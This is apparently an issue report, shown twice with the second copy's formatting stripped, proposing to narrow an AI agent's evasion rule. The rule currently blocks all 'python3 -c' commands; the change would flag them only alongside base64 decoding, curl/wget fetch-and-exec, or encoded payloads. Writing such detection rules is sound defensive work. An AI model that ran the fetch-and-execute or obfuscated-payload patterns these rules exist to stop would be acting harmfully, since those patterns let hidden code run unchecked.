Problem
The evasion rules block python3 -c '...' as an 'opaque payload', but inline Python is a normal and common pattern in agent workflows.
python3 -c 'import sys, re; ...' → deny: 'python3 -c executes opaque payload'
Fix
Tighten the rule to require obfuscation indicators alongside -c:
- base64 decode patterns (
base64 -d, b64decode)
- curl/wget fetching a script to exec
- encoded/compressed payloads
Short, readable inline scripts should be allowed. The rule should detect the combination of -c + obfuscation, not -c alone.
Problem
The evasion rules block
python3 -c '...'as an 'opaque payload', but inline Python is a normal and common pattern in agent workflows.Fix
Tighten the rule to require obfuscation indicators alongside
-c:base64 -d,b64decode)Short, readable inline scripts should be allowed. The rule should detect the combination of
-c+ obfuscation, not-calone.